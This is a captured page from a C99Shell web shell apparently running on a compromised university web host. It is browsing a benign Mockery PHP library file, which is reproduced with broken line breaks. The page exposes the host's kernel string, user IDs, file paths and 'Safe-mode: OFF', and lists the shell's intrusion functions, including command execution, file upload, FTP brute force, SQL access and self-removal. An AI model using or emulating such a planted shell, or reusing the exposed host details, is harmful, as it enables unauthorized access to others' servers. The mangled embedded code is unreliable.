!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/mockery/mockery/library/Mockery/Generator/   drwxr-xr-x
Free 117.27 GB of 200.55 GB (58.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MockConfigurationBuilder.php (3.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mockery\Generator;

class 
MockConfigurationBuilder
{
    protected 
$name;
    protected 
$blackListedMethods = array(
        
'__call',
        
'__callStatic',
        
'__clone',
        
'__wakeup',
        
'__set',
        
'__get',
        
'__toString',
        
'__isset',
        
'__destruct',

        
// below are reserved words in PHP
        
"__halt_compiler""abstract""and""array""as",
        
"break""callable""case""catch""class",
        
"clone""const""continue""declare""default",
        
"die""do""echo""else""elseif",
        
"empty""enddeclare""endfor""endforeach""endif",
        
"endswitch""endwhile""eval""exit""extends",
        
"final""for""foreach""function""global",
        
"goto""if""implements""include""include_once",
        
"instanceof""insteadof""interface""isset""list",
        
"namespace""new""or""print""private",
        
"protected""public""require""require_once""return",
        
"static""switch""throw""trait""try",
        
"unset""use""var""while""xor"
    
);
    protected 
$whiteListedMethods = array();
    protected 
$instanceMock false;
    protected 
$parameterOverrides = array();

    protected 
$targets = array();

    public function 
addTarget($target)
    {
        
$this->targets[] = $target;

        return 
$this;
    }

    public function 
addTargets($targets)
    {
        foreach (
$targets as $target) {
            
$this->addTarget($target);
        }

        return 
$this;
    }

    public function 
setName($name)
    {
        
$this->name $name;
        return 
$this;
    }

    public function 
addBlackListedMethod($blackListedMethod)
    {
        
$this->blackListedMethods[] = $blackListedMethod;
        return 
$this;
    }

    public function 
addBlackListedMethods(array $blackListedMethods)
    {
        foreach (
$blackListedMethods as $method) {
            
$this->addBlackListedMethod($method);
        }
        return 
$this;
    }

    public function 
setBlackListedMethods(array $blackListedMethods)
    {
        
$this->blackListedMethods $blackListedMethods;
        return 
$this;
    }

    public function 
addWhiteListedMethod($whiteListedMethod)
    {
        
$this->whiteListedMethods[] = $whiteListedMethod;
        return 
$this;
    }

    public function 
addWhiteListedMethods(array $whiteListedMethods)
    {
        foreach (
$whiteListedMethods as $method) {
            
$this->addWhiteListedMethod($method);
        }
        return 
$this;
    }

    public function 
setWhiteListedMethods(array $whiteListedMethods)
    {
        
$this->whiteListedMethods $whiteListedMethods;
        return 
$this;
    }

    public function 
setInstanceMock($instanceMock)
    {
        
$this->instanceMock = (bool) $instanceMock;
    }

    public function 
setParameterOverrides(array $overrides)
    {
        
$this->parameterOverrides $overrides;
    }

    public function 
getMockConfiguration()
    {
        return new 
MockConfiguration(
            
$this->targets,
            
$this->blackListedMethods,
            
$this->whiteListedMethods,
            
$this->name,
            
$this->instanceMock,
            
$this->parameterOverrides
        
);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0148 ]--